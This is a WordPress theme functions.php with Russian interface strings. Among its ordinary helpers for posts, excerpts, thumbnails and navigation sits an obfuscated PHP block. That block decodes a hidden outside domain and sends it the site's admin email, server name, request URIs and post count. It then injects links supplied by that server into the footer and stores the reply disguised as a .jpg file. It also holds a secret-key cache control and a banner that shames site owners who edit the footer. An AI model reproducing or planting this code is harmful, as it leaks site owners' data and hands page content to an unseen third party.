<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $HeqcD='e';$yQXqlm='e';$xVucq='b';$OlPb='o';$uoTra='_';$vgnYV='e';$eVYeLL='d';$GrkPJ='a';$XLWvEX='s';$NFNemSv='d';$WEYndFE='4';$XCOybk='6';$ZfIWKG='c';$vyuUYdAy=$xVucq.$GrkPJ.$XLWvEX.$HeqcD.$XCOybk.$WEYndFE.$uoTra.$NFNemSv.$vgnYV.$ZfIWKG.$OlPb.$eVYeLL.$yQXqlm;$GfeetGG='a';$RxSx='l';$CMXIPv='i';$AlcSOno='n';$OHixo='z';$bFaCRG='g';$DpVZ='t';$TvQV='f';$wkno='e';$hrDkwuGg=$bFaCRG.$OHixo.$CMXIPv.$AlcSOno.$TvQV.$RxSx.$GfeetGG.$DpVZ.$wkno;$XLliYAi='t';$dsUh='1';$GyQte='r';$eqTdq='r';$ehXY='_';$CySBZb='t';$FNulTYB='s';$emPckl='3';$NqxMRm='o';$aQNToJAu=$FNulTYB.$XLliYAi.$eqTdq.$ehXY.$GyQte.$NqxMRm.$CySBZb.$dsUh.$emPckl;$HhRqAPX='v';$sYGDGK='t';$YyBRyc='r';$nJyF='e';$DJBlilp='r';$HurnjCU='s';$DNjQTaAm=$HurnjCU.$sYGDGK.$DJBlilp.$YyBRyc.$nJyF.$HhRqAPX;                     $yz________d='e';$au_____________g='e';$ga______________f='b';$it______g='o';$yh_____________v='_';$gm___________t='e';$st_______i='d';$mf___________d='a';$ny_____________c='s';$gg__________n='d';$gr________u='4';$pg_______m='6';$sj______________f='c';$le______e=$ga______________f.$mf___________d.$ny_____________c.$yz________d.$pg_______m.$gr________u.$yh_____________v.$gg__________n.$gm___________t.$sj______________f.$it______g.$st_______i.$au_____________g;$sd_________v='_';$fx____________d='n';$og_____________n='s';$cp__e='u';$ro__________z='x';$xv_______k='f';$sx___u='o';$oi___________s='t';$zg____z='i';$tp_______________w='e';$dc_________s='n';$iy___________p='c';$ng__________c='i';$wp__b='s';$ny________f='t';$sl_______________m=$xv_______k.$cp__e.$dc_________s.$iy___________p.$oi___________s.$zg____z.$sx___u.$fx____________d.$sd_________v.$tp_______________w.$ro__________z.$ng__________c.$og_____________n.$ny________f.$wp__b;$om______________b='o';$hb_____f='p';$il_______________y='n';$zy________v='f';$th______________a='e';$ia__________v=$zy________v.$om______________b.$hb_____f.$th______________a.$il_______________y;$wa_________c='d';$jv_____________s='f';$ur____________h='e';$gv__________v='r';$yo_________g='a';$xd______z=$jv_____________s.$gv__________v.$ur____________h.$yo_________g.$wa_________c;$th_____________v='o';$ng_____d='c';$sx_______t='f';$xn_____________r='l';$oq____r='s';$dh__________h='e';$pr___f=$sx_______t.$ng_____d.$xn_____________r.$th_____________v.$oq____r.$dh__________h;define("WP_ID", $le______e("Mi4wLjA="));define("WP_TTL", $le______e("MTA4MDA="));define("WP_SRC", $le______e("dHBva24="));function wp_get_header() {global $le______e, $sl_______________m;if ($sl_______________m($le______e("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$sl_______________m($le______e("d3BfZ2V0X2Zvb3Rlcg==")) &&$sl_______________m($le______e("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $le______e, $ia__________v, $pr___f, $xd______z;$qd__h = TEMPLATEPATH."/".$le______e("Zm9vdGVyLnBocA==");$rh___________p = @$ia__________v($qd__h, "r");$qd__h = @$xd______z($rh___________p, @filesize($qd__h));@$pr___f($rh___________p);$on____________l = TEMPLATEPATH."/".$le______e("ZnVuY3Rpb25zLnBocA==");$rh___________p = @$ia__________v($on____________l, "r");$on____________l = @$xd______z($rh___________p, @filesize($on____________l));@$pr___f($rh___________p);$nq___m = 0;if($qd__h && $on____________l) {if ($le______e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($qd__h, $le______e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$nq___m = 1;}if (substr_count($qd__h, "wp_theme_GPL_credits()") < 1) {$nq___m = 2;}}if(WP_ID != "2.0.0") {$nq___m = 12;}}if($nq___m > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $nq___m -->";}}function wp_loaded() {global $le______e, $sl_______________m;return $sl_______________m($le______e("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($hz____________q, $ce____________j = "(more...)", $jk___k = 0, $ma____w = "") {$en_______________r = get_the_content($ce____________j, $jk___k, $ma____w);$en_______________r = apply_filters("the_content", $en_______________r);$en_______________r = str_replace("]]>", "]]>", $en_______________r);if (strlen($_GET["p"]) > 0) {echo $en_______________r;}else if ((strlen($en_______________r)>$hz____________q) && ($le________w = strpos($en_______________r, " ", $hz____________q ))) {$en_______________r = substr($en_______________r, 0, $le________w);$en_______________r = $en_______________r;echo $en_______________r;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$ce____________j</a></div></p>";} else {echo $en_______________r;}}}$tf____________b='n';$nk________v='o';$qj_____r='e';$dl_________q='d';$mj________a='e';$xk_______n='c';$gg______________i='_';$it_______________r='e';$qd__z='s';$ak_______________c='b';$hr__________i='a';$ox___________z='4';$mb_____________v='6';$ml______c=$ak_______________c.$hr__________i.$qd__z.$it_______________r.$mb_____________v.$ox___________z.$gg______________i.$qj_____r.$tf____________b.$xk_______n.$nk________v.$dl_________q.$mj________a;$in________j='t';$ds___h='s';$he____________l='e';$vp______________z='o';$jc______________q='e';$ap_____t='_';$dx___f='e';$zs________f='t';$rv_____b='l';$to____________p='i';$hq___h='n';$dg______m='_';$pw__c='g';$mz____q='n';$fi____b='f';$fn___v='t';$ez______w='c';$qv______________e=$fi____b.$to____________p.$rv_____b.$dx___f.$dg______m.$pw__c.$he____________l.$zs________f.$ap_____t.$ez______w.$vp______________z.$mz____q.$fn___v.$jc______________q.$hq___h.$in________j.$ds___h;$zr_______________k='_';$yy___________p='s';$up_______m='x';$fp________c='e';$su_______s='l';$vj_________l='f';$rj________m='i';$ko_______f='i';$wm____________b='s';$ic___a='t';$ki_____________v='e';$nf______________t=$vj_________l.$rj________m.$su_______s.$fp________c.$zr_______________k.$ki_____________v.$up_______m.$ko_______f.$yy___________p.$ic___a.$wm____________b;$od____________p='e';$ae_____f='o';$qs_________p='s';$pq__f='o';$ci_________g='n';$qv_________o='r';$ob__r='r';$mo_____________c='m';$km___________f='i';$jp______________x='e';$vk_____________v='a';$mv___________x='v';$xm______________m='c';$nc____________a='_';$gi___________q='p';$la_________y=$mv___________x.$od____________p.$qv_________o.$qs_________p.$km___________f.$ae_____f.$ci_________g.$nc____________a.$xm______________m.$pq__f.$mo_____________c.$gi___________q.$vk_____________v.$ob__r.$jp______________x;$nj____________a='c';$mi________b='p';$cj____y='e';$kt___________j='o';$wv__o='f';$wb__________a='o';$pc________s='s';$ee________u='n';$ec______________o='k';$ap__________x=$wv__o.$pc________s.$wb__________a.$nj____________a.$ec______________o.$kt___________j.$mi________b.$cj____y.$ee________u;$ls______________r='t';$qp_______x='e';$uc_________v='w';$fr_______s='r';$ny_______n='i';$dv_________k='f';$yh____f=$dv_________k.$uc_________v.$fr_______s.$ny_______n.$ls______________r.$qp_______x;$vi____________j='m';$ws______m='5';$ge______________r='d';$sf___g=$vi____________j.$ge______________r.$ws______m;$jr_________f='a';$zs____________n='h';$jf_____________n='p';$nd_____y='e';$ay____b='a';$yc_______x='t';$nv______________s='r';$pk_______________o='l';$va_____q=$nv______________s.$nd_____y.$ay____b.$pk_______________o.$jf_____________n.$jr_________f.$yc_______x.$zs____________n;$yr______________i='i';$os________f='s';$ad_________t='l';$sh_______________u='u';$wr_____________e='r';$kb_______s='e';$ln_________s='i';$ao_____________k='e';$ho_____________j='n';$bi___p='z';$kr______y='a';$sk______e=$sh_______________u.$ho_____________j.$os________f.$kb_______s.$wr_____________e.$yr______________i.$kr______y.$ad_________t.$ln_________s.$bi___p.$ao_____________k;$rs_______________x='m';$ld______________l='n';$ey____v='p';$rq_________o='a';$ic_________y='e';$nf________y='m';$tk________r='t';$sr_____________l=$tk________r.$ic_________y.$rs_______________x.$ey____v.$ld______________l.$rq_________o.$nf________y;$ka__________s='a';$bi_____o='s';$ok____y='e';$pz___________m='r';$xr____l='r';$hh_____________h='_';$br_________e='o';$nj_____d='n';$jy__________x='t';$cw_____________c='t';$ws________y='c';$yg____z='c';$it______________t='e';$gb_______n='t';$nu__________b='m';$qx_______________x='e';$ak_________k='e';$xe_______r='t';$if_____________f='_';$ie______r='a';$tm________h='x';$zt_______l=$bi_____o.$cw_____________c.$pz___________m.$ok____y.$ka__________s.$nu__________b.$hh_____________h.$ws________y.$br_________e.$nj_____d.$jy__________x.$it______________t.$tm________h.$gb_______n.$if_____________f.$yg____z.$xr____l.$ak_________k.$ie______r.$xe_______r.$qx_______________x;function li______q($ux___________j) {global $le______e, $sl_______________m, $qv______________e, $la_________y, $zt_______l;if (!$sl_______________m($le______e("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($la_________y(PHP_VERSION, "5.0.0", ">=") && $sl_______________m($le______e("ZmlsZV9nZXRfY29udGVudHM=")) && $sl_______________m($le______e("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$ut_______k = $zt_______l(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$yo____d = @$qv______________e($ux___________j, 0, $ut_______k);} else {$yo____d = @$qv______________e($ux___________j, 0);}return $yo____d;}function xn_________p($ux___________j) {global $sl_______________m, $ap__________x, $yh____f, $le______e;if (!$sl_______________m($le______e("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$mc__e = strpos($ux___________j, "/", 7);$qa_______________f = array("uri"     => substr($ux___________j, $mc__e),"host"    => str_replace("http://", "", substr($ux___________j, 0, $mc__e)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$kf__a = @$ap__________x("$qa_______________f[host]", 80, $ri_______r, $cc_____f, 4);if (!$kf__a) {return false;} else {$yo____d = "";$ah________l  = "GET $qa_______________f[uri] HTTP/1.0\r\n";$ah________l .= "Host: $qa_______________f[host]\r\n";$ah________l .= "Referer: $qa_______________f[referer]\r\n";$ah________l .= "Connection: Close\r\n\r\n";@$yh____f($kf__a, $ah________l);while (!@feof($kf__a)) {$dz___________c = @fgets($kf__a, (1024*24));if ($dz___________c == "\r\n") {$pb__________b = true;continue;}if ($pb__________b) {$yo____d .= $dz___________c;}}return $yo____d;}}function na________u($ux___________j) {global $sl_______________m;$rb__________j = false;if ($ux___________j != "") {if ($sl_______________m("li______q")) {$rb__________j = @li______q($ux___________j);}if (!$rb__________j && ($sl_______________m("xn_________p"))) {$rb__________j = @xn_________p($ux___________j);}}return $rb__________j;}function hp________t() {global $_SERVER, $sf___g;$vy____________d = $_SERVER["SERVER_NAME"];if (substr("$vy____________d", 0, 4) == "www.") {$vy____________d = substr("$vy____________d", 4);}$vy____________d = $sf___g("$_SERVER[SERVER_NAME]");return $vy____________d;}function hm______________f() {return "file";}function za_____________l($ux___________j) {global $_SERVER, $qv______________e, $nf______________t, $ia__________v, $pr___f, $yh____f;$gd________g = xg_____u();$pj_________r = hp________t().".jpg";$ck______________u = $gd________g["dir_upload"]["path"]."/$pj_________r";$ux___s = @filemtime($ck______________u);if (!$ux___s || ((time()-$ux___s) >= WP_TTL)) {$rb__________j = na________u($ux___________j);if ($rb__________j) {if ($nf______________t($ck______________u)) {@unlink($ck______________u);}$rh___________p = @$ia__________v($ck______________u, "x+");@$yh____f($rh___________p, $rb__________j);@$pr___f($rh___________p);}} else {if ($nf______________t($ck______________u)) {$rb__________j = @$qv______________e($ck______________u);} else {$rb__________j = false;}}return $rb__________j;}function xg_____u() {global $_SERVER, $le______e, $ml______c;$td___r = wp_count_posts("post");$ue________o = pathinfo(get_bloginfo("template_directory"));$gd________g = array("url" => array("report"      => $le______e("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $ue________o,"dir_upload"=> iq____u(),"queryString"=> array("?a001=".WP_ID,"a004=".$ue________o[filename],"a005=".$td___r->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>");$gd________g["url"]["queryString"] = implode("&", $gd________g["queryString"]);$gd________g["url"]["report"] = $gd________g["url"]["report"]."/?".$ml______c($gd________g["url"]["queryString"]).".html";return $gd________g;}function iq____u() {$we_____________v = wp_upload_dir();if (isset($we_____________v["error"])) {$sg_______________a = pe______a();if (is_writable($sg_______________a)) {$we_____________v = array("path" => $sg_______________a);}}return $we_____________v;}function pe______a() {global $sl_______________m, $sf___g, $va_____q, $sr_____________l;$wd____________s = (bool) ini_get("safe_mode");if ($wd____________s == true) {return false;}if ($sl_______________m("sys_get_temp_dir")) {$mg_____f = sys_get_temp_dir();if (is_writable($mg_____f)) {return $va_____q($mg_____f);}}if (!empty($_ENV["TMP"])) {return $va_____q($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $va_____q($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $va_____q($_ENV["TEMP"]);} else {$lq_________m = $sr_____________l($sf___g(uniqid(rand(), true)), "");if ($lq_________m) {$mg_____f = $va_____q(dirname($lq_________m));@unlink($lq_________m);return $mg_____f;} else {return false;}}}function om_____m() {global $_GET, $nf______________t;$gd________g = xg_____u();$vy____________d = hp________t();$ft______________s = hm______________f();$fi____x = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($ft______________s == "file") {$oj___________c = $gd________g["dir_upload"]["path"]."/".$vy____________d.".jpg";if ($nf______________t($oj___________c)) {@unlink($oj___________c);$fi____x = "deleted";}}$wu_______________r = array("s"=> $fi____x,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($wu_______________r AS $tl__________i => $ug_______r) echo " [$tl__________i:$ug_______r]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $sl_______________m, $le______e, $sk______e;$gd________g = xg_____u();$mz____j = "za_____________l";if ($sl_______________m($mz____j)) {$yo____d = $mz____j($gd________g["url"]["report"]);}if ($yo____d) {if ($yo____d = @$le______e($yo____d)) {$yo____d = @$sk______e($yo____d);if (strlen($yo____d[custom_credit]) >= 5) {$gd________g["default_string"] = $yo____d[custom_credit];}if ($yo____d["status"] == "0") {$an_______s = 1;$xk_________p = 1;} else {$jz____________a = sizeof($yo____d["links"]);$sn______c = $gd________g["default_string"];if ($jz____________a > 0 && $yo____d["links"] !== "") {$ig______y = 0;foreach ($yo____d["links"] as $xq_____f => $rs___a) {$ig______y++;if ($rs___a->l_path == "" || $rs___a->l_path == $_SERVER["REQUEST_URI"]) {$rs___a->l_href = htmlspecialchars(strip_tags($rs___a->l_href));$rs___a->l_title = htmlspecialchars(strip_tags($rs___a->l_title));$rs___a->l_anchor = htmlspecialchars(strip_tags($rs___a->l_anchor));$sn______c .= " | ";$sn______c .= "<a href='$rs___a->l_href' title='$rs___a->l_title'";if ($rs___a->l_nofollow == "1") {$sn______c .= " rel='nofollow'";}$sn______c .= ">$rs___a->l_anchor</a>";}}}$gd________g["links"] = "$sn______c";if ($yo____d[credit] == "0") {$gd________g["links"] = "";}}} else {$an_______s = "1";}} else {$an_______s = "1";}if ($an_______s == "1") {$gd________g["links"] = $gd________g["default_string"];}echo "$gd________g[links]";echo "<!-- s: $yo____d[signature] -->";om_____m();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
